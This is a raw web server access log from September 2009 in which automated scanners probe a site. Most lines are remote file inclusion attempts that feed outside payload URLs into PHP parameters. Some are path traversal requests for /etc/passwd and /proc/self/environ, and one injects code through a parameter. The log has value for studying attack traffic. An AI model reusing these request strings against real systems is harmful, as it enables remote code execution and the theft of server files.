59.24.49.35 - - [11/Sep/2009:00:56:43 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:57:54 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:57:54 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:57:54 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:57:55 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:57:55 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:57:55 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:58:58 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:58:58 -0500] "GET /logs/access_log.1236038400/convert/mvcw.php?step=1&vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:58:58 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:59:01 -0500] "GET /logs/access_log.1236038400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:59:12 -0500] "GET /logs/access_log.1236038400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:59:13 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:59:13 -0500] "GET /?custompluginfile[]=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:59:14 -0500] "GET /logs/?custompluginfile[]=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
85.214.91.139 - - [11/Sep/2009:01:00:28 -0500] "GET //include/admin.lib.inc.php?site_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.214.91.139 - - [11/Sep/2009:01:00:28 -0500] "GET /logs/access_log.1237075200//include/admin.lib.inc.php?site_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.214.91.139 - - [11/Sep/2009:01:00:28 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.214.91.139 - - [11/Sep/2009:01:00:29 -0500] "GET /logs/access_log.1236211200//include/admin.lib.inc.php?site_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:01:00:34 -0500] "GET /logs/access_log.1231891200/convert/mvcw.php?step=1&vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:01:04:06 -0500] "GET /logs/access_log.1244764800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:01:06:19 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:01:06:19 -0500] "GET /?custompluginfile[]=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:01:06:26 -0500] "GET /logs/?custompluginfile[]=http://tiete.com.br/copyright.txt???? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:07:34 -0500] "GET /logs///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:07:34 -0500] "GET /logs/access_log.1236038400///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:07:34 -0500] "GET ///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:08:08 -0500] "GET /logs///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:08:08 -0500] "GET ///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:08:08 -0500] "GET /logs/access_log.1236038400///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:25 -0500] "GET //rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:25 -0500] "GET /logs//rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:25 -0500] "GET /logs/access_log.1242432000//rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:25 -0500] "GET /logs/access_log.1242172800//rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:27 -0500] "GET /logs//rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:27 -0500] "GET //rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:28 -0500] "GET /logs/access_log.1242432000//rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:01:08:28 -0500] "GET /logs/access_log.1242172800//rgboard//include/mail.inc.php?skin_board_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:08:46 -0500] "GET /logs/access_log.1244764800///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:01:09:14 -0500] "GET /logs/access_log.1244764800///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:01:09:31 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:01:09:31 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:01:09:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:01:09:46 -0500] "GET /logs/access_log.1244505600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:01:13:51 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:01:13:53 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:01:13:56 -0500] "GET /logs/access_log.1244764800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.55.207.77 - - [11/Sep/2009:01:19:06 -0500] "GET /logs/access_log.1228694400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.192 - - [11/Sep/2009:01:19:26 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.192 - - [11/Sep/2009:01:19:26 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.192 - - [11/Sep/2009:01:19:26 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.208.118 - - [11/Sep/2009:01:24:17 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [11/Sep/2009:01:24:18 -0500] "GET /logs/access_log.1251072000 HTTP/1.1" 200 557926 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
58.120.226.113 - - [11/Sep/2009:01:26:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:01:26:29 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:01:26:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:01:26:55 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:01:28:13 -0500] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:01:28:13 -0500] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:01:29:03 -0500] "GET /logs/access_log.1246492800//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.100.186.87 - - [11/Sep/2009:01:29:48 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
61.100.186.87 - - [11/Sep/2009:01:29:48 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.186.87 - - [11/Sep/2009:01:29:48 -0500] "GET /logs/access_log.1247097600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.100.186.87 - - [11/Sep/2009:01:29:48 -0500] "GET /logs/access_log.1247443200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:01:29:51 -0500] "GET //?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:01:29:51 -0500] "GET /logs/access_log.1233619200//?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:01:29:53 -0500] "GET /logs//?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 200 204583 "-""Mozilla/5.0"
58.120.226.113 - - [11/Sep/2009:01:30:26 -0500] "GET /logs/access_log.1241395200//?DOCUMENT_ROOT=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
222.236.47.192 - - [11/Sep/2009:01:31:00 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
205.234.246.98 - - [11/Sep/2009:01:34:16 -0500] "GET //index2.php?n=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""-"
205.234.246.98 - - [11/Sep/2009:01:34:16 -0500] "GET /logs//index2.php?n=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""-"
205.234.246.98 - - [11/Sep/2009:01:34:16 -0500] "GET /logs//index2.php?n=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""-"
205.234.246.98 - - [11/Sep/2009:01:34:16 -0500] "GET //index2.php?n=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""-"
222.234.2.95 - - [11/Sep/2009:01:37:49 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.npd-nordhausen.de/files//redaxo/idade1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.234.2.95 - - [11/Sep/2009:01:37:49 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.npd-nordhausen.de/files//redaxo/idade1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.234.2.95 - - [11/Sep/2009:01:37:49 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.npd-nordhausen.de/files//redaxo/idade1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.234.2.95 - - [11/Sep/2009:01:39:27 -0500] "GET /logs/access_log.1240531200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.npd-nordhausen.de/files//redaxo/idade1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:01:43:29 -0500] "GET /index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:01:43:29 -0500] "GET /logs/index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:01:43:29 -0500] "GET /logs/access_log.1244764800/index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:01:47:08 -0500] "GET /main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:01:47:09 -0500] "GET /logs/main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:01:47:09 -0500] "GET /logs/access_log.1243987200/main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:01:47:09 -0500] "GET /logs/access_log.1246665600/main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.106.155 - - [11/Sep/2009:01:47:37 -0500] "GET /logs/access_log.1148169600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
59.24.49.35 - - [11/Sep/2009:01:47:47 -0500] "GET /main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:01:47:47 -0500] "GET /logs/access_log.1246665600/main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:01:47:47 -0500] "GET /logs/main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:01:47:54 -0500] "GET /logs/access_log.1243987200/main.php?x=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.157.45.177 - - [11/Sep/2009:01:48:16 -0500] "GET /logs//lang.php?arg=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
88.157.45.177 - - [11/Sep/2009:01:48:16 -0500] "GET //lang.php?arg=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
88.157.45.177 - - [11/Sep/2009:01:48:17 -0500] "GET /logs//lang.php?arg=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
88.157.45.177 - - [11/Sep/2009:01:48:17 -0500] "GET //lang.php?arg=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
121.78.116.209 - - [11/Sep/2009:01:49:13 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:01:49:13 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:01:49:13 -0500] "GET /logs/access_log.1251763200//admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:01:50:44 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:51:31 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:51:31 -0500] "GET /logs/access_log.1244764800/errors.php?error=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:51:32 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:51:37 -0500] "GET /logs/access_log.1237075200/errors.php?error=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.68.48 - - [11/Sep/2009:01:52:57 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.48 - - [11/Sep/2009:01:52:59 -0500] "GET /logs/access_log.1246579200 HTTP/1.1" 200 701964 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
161.58.160.13 - - [11/Sep/2009:01:53:14 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 305 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:01:53:14 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 310 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:01:53:15 -0500] "GET /logs/access_log.1251763200//admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 332 "-""Mozilla/5.0"
65.55.106.137 - - [11/Sep/2009:01:53:16 -0500] "GET /logs/access_log.1196985600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.91.139 - - [11/Sep/2009:01:55:18 -0500] "GET /logs/access_log.1244764800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.214.91.139 - - [11/Sep/2009:01:55:18 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.214.91.139 - - [11/Sep/2009:01:55:26 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
161.58.160.13 - - [11/Sep/2009:01:55:28 -0500] "GET /logs/access_log.1248134400//admin/business_inc/saveserver.php?thisdir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 332 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:01:56:23 -0500] "GET //config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:01:56:23 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:01:56:23 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.214.91.139 - - [11/Sep/2009:01:56:40 -0500] "GET /logs/access_log.1237075200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:01:56:57 -0500] "GET /logs/access_log.1244764800//config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:11 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:11 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:11 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:14 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:14 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:14 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:22 -0500] "GET /logs/access_log.1249344000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:01:57:24 -0500] "GET /logs/access_log.1249344000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
80.67.26.96 - - [11/Sep/2009:01:57:49 -0500] "GET //jaf/index.php?show=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.67.26.96 - - [11/Sep/2009:01:57:49 -0500] "GET /logs/access_log.1238112000//jaf/index.php?show=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.67.26.96 - - [11/Sep/2009:01:57:49 -0500] "GET /logs//jaf/index.php?show=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
118.129.166.203 - - [11/Sep/2009:01:58:40 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://pyungan.or.kr/bbs/user/idk2.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
118.129.166.203 - - [11/Sep/2009:01:58:40 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://pyungan.or.kr/bbs/user/idk2.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
72.51.42.92 - - [11/Sep/2009:02:01:17 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://super.gameshot.net/ps3/zboard/data/cok.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
